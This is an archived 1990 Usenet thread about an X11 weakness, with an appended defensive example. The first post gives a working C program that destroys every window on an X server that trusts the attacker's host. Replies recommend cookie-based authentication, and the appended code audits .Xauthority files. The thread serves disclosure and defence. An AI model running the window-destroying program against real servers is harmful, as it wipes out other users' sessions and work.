randy@uokmax.ecn.uoknor.edu (Longshot) (02/09/90)
This is a potential problem, and I'm sure I'm not the first to find it:
#include <X11/Xlib.h>
#include <X11/Xutil.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */

int main(int argc, char **argv)
{
    Display *mydisplay;

    /* An empty name means "use $DISPLAY". */
    mydisplay = XOpenDisplay("");
    if (!mydisplay) {
        fprintf(stderr,"Could not open display.\n");
        exit(1);
    }
    /* Destroys every child of the root window, whichever client created it. */
    XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay));
    XCloseDisplay(mydisplay);
    return 0;
}
Needless to say, if you are on a host that is trusted to an X server, this
small segment can wreck them. After this executes, ALL windows on the server
bound to DISPLAY die quickly and completely. I first had someone run this from
his X environment (an xterm running from twm), and then I ran it on an ascii
terminal connected to a host that was trusted to the X server. Obviously, if
a host is not permitted to a server, this program will die, but here we run our
servers on Suns and Mac II's, and most of the applications on our Encore, which
is faster and can handle the load. The same Multimax averages 60-80 users
during peak hours, any of which who know X could do this. Doesn't X keep some
sort of identifier in a window structure or display structure that identifies
the owner? This is nasty!
Randy
--
Randy J. Ray University of Oklahoma, Norman Campus (405)/325-5370
!chinet!uokmax!randy randy@uokmax.uucp randy@uokmax.ecn.uoknor.edu
Flaming makes you feel better, sorta like popping the little plastic bubbles
in packaging material. -Tim Perala
argv%turnpike@Sun.COM (Dan Heller) (02/09/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes:
> This is a potential problem, and I'm sure I'm not the first to find it:
> XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay));
> Needless to say, if you are on a host that is trusted to an X server, this
> small segment can wreck them.
> This is nasty!
Patient: Doctor, it hurts when I do this.
Doctor: Then don't do that. :-D
dan
-----------------------------------------------------------
O'Reilly && Associates
argv@sun.com / argv@ora.com
632 Petaluma Ave, Sebastopol, CA 95472
800-338-NUTS, in CA: 800-533-NUTS, FAX 707-829-0104
stripes@eng.umd.edu (Joshua Osborne) (02/10/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes:
>This is a potential problem, and I'm sure I'm not the first to find it:
You aren't, and this isn't the worst (be clever... read the man pages for xterm).
[...]
>Needless to say, if you are on a host that is trusted to an X server, this
>small segment can wreck them.
[...]
Don't trust any hosts. Get X11R4 and use MIT-COOKIE-1 (you need to start X
with the -auth option, and use xauth, or the Xau lib functions to make yourself
a .Xauthority file). Then you only need to trust 2 people, you and root.
--
stripes@wam.umd.edu "Security for Unix is like
Josh_Osborne@Real_World,The Mutitasking for MS-DOS"
"The dyslexic porgramer" - Kevin Lockwood
Who needs friends when you can sit alone in your room and drink?
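
An added example, not part of any post in this thread: a small auditor for the .Xauthority file mentioned in the last reply. It walks the file's records and reports which displays carry a cookie under the name the file actually stores, MIT-MAGIC-COOKIE-1. The function name audit_xauthority, the 16-byte length policy and the SAMPLE bytes are assumptions made up for this example.

```c
#include <stdio.h>
#include <string.h>

/* One counted field: 2-byte big-endian length, then that many bytes. */
struct field { const unsigned char *p; size_t len; };

static int rd_u16(const unsigned char *b, size_t n, size_t *off, unsigned *v) {
    if (n - *off < 2) return -1;
    *v = ((unsigned)b[*off] << 8) | b[*off + 1];
    *off += 2;
    return 0;
}

static int rd_field(const unsigned char *b, size_t n, size_t *off, struct field *f) {
    unsigned len;
    if (rd_u16(b, n, off, &len) || n - *off < len) return -1;
    f->p = b + *off; f->len = len; *off += len;
    return 0;
}

/* Walks every record (family, address, display number, auth name, auth data).
   Returns how many are MIT-MAGIC-COOKIE-1 with a 16-byte cookie (assumed policy),
   stores the record count in *total, -1 if truncated. Cookies are never printed. */
int audit_xauthority(const unsigned char *b, size_t n, int *total) {
    static const char want[] = "MIT-MAGIC-COOKIE-1";
    size_t off = 0; int ok = 0;
    *total = 0;
    while (off < n) {
        unsigned family;
        struct field addr, num, name, data;
        if (rd_u16(b, n, &off, &family) || rd_field(b, n, &off, &addr) ||
            rd_field(b, n, &off, &num) || rd_field(b, n, &off, &name) ||
            rd_field(b, n, &off, &data)) return -1;
        int good = name.len == sizeof want - 1 &&
                   memcmp(name.p, want, name.len) == 0 && data.len == 16;
        printf("display :%.*s family=%u auth=%.*s datalen=%zu %s\n",
               (int)num.len, (const char *)num.p, family, (int)name.len,
               (const char *)name.p, data.len, good ? "ok" : "WEAK");
        ok += good;
        ++*total;
    }
    return ok;
}

/* Constructed sample: two records for host "host"; the second has a 4-byte cookie. */
static const unsigned char SAMPLE[] =
    "\x01\x00" "\x00\x04" "host" "\x00\x01" "0" "\x00\x12" "MIT-MAGIC-COOKIE-1" "\x00\x10" "0123456789abcdef"
    "\x01\x00" "\x00\x04" "host" "\x00\x01" "1" "\x00\x12" "MIT-MAGIC-COOKIE-1" "\x00\x04" "abcd";
int main(void) { int t; return audit_xauthority(SAMPLE, sizeof SAMPLE - 1, &t) < 0; }
```

To audit a real file, read it into a buffer and pass the buffer and its length instead of SAMPLE.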